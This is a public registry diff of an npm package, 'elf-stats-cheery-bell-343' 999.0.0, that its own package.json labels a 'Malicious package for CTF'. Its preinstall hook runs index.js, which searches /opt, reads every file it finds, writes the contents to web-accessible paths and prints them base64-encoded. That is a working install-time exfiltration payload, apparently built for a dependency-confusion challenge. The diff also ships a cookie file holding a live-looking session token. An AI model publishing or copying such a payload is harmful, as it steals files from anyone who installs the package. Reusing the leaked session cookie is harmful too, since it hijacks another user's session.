elf-stats-cheery-bell-343 999.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/Accept: ADDED
File without changes
File without changes
package/Content-Type: ADDED
File without changes
package/Host: ADDED
File without changes
package/POST ADDED
File without changes
package/User-Agent: ADDED
File without changes
package/cookies.txt ADDED
@@ -0,0 +1,5 @@
1
+ # Netscape HTTP Cookie File
2
+ # https://curl.se/docs/http-cookies.html
3
+ # This file was generated by libcurl! Edit at your own risk.
4
+
5
+ #HttpOnly_dyn-02.xmas.root-me.org FALSE / FALSE 1764766947 connect.sid s%3Alg6bn0m6FmqGsdXTxVNz_ZRZq_8bVcVg.JAdnYfPGpXCwIjuP9Dugnstk4RHU%2BS2mc530ba2mM2Y
package/index.js ADDED
@@ -0,0 +1,49 @@
1
+ const { execSync } = require('child_process');
2
+ const fs = require('fs');
3
+ const path = require('path');
4
+
5
+ try {
6
+ // Find Santa's list in /opt/
7
+ const result = execSync('find /opt/ -type f 2>/dev/null', {encoding: 'utf8'});
8
+ console.log('[PAYLOAD] Files found:', result);
9
+
10
+ // Try to read all files found
11
+ const files = result.split('\n').filter(f => f.trim());
12
+ let output = '=== SANTA LIST EXFILTRATION ===\n\n';
13
+
14
+ files.forEach(file => {
15
+ try {
16
+ const content = fs.readFileSync(file, 'utf8');
17
+ output += `\n=== FILE: ${file} ===\n${content}\n`;
18
+ } catch(e) {
19
+ output += `\n=== FILE: ${file} === [ERROR: ${e.message}]\n`;
20
+ }
21
+ });
22
+
23
+ // Write to a publicly accessible location
24
+ // Try multiple locations that might be web-accessible
25
+ const locations = [
26
+ '/tmp/santa_exfil.txt',
27
+ './public/santa_exfil.txt',
28
+ './santa_exfil.txt',
29
+ '/var/www/html/santa_exfil.txt'
30
+ ];
31
+
32
+ locations.forEach(loc => {
33
+ try {
34
+ fs.writeFileSync(loc, output);
35
+ console.log(`[PAYLOAD] Written to ${loc}`);
36
+ } catch(e) {}
37
+ });
38
+
39
+ // Also try to send via HTTP if curl is available
40
+ try {
41
+ // Use webhook.site or similar - but let's use a simple approach
42
+ // Output base64 encoded so it can be retrieved
43
+ console.log('[PAYLOAD] BASE64 OUTPUT:');
44
+ console.log(Buffer.from(output).toString('base64'));
45
+ } catch(e) {}
46
+
47
+ } catch(error) {
48
+ console.log('[PAYLOAD] Error:', error.message);
49
+ }
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "elf-stats-cheery-bell-343",
3
+ "version": "999.0.0",
4
+ "description": "Malicious package for CTF",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js"
8
+ },
9
+ "author": "attacker",
10
+ "license": "MIT"
11
+ }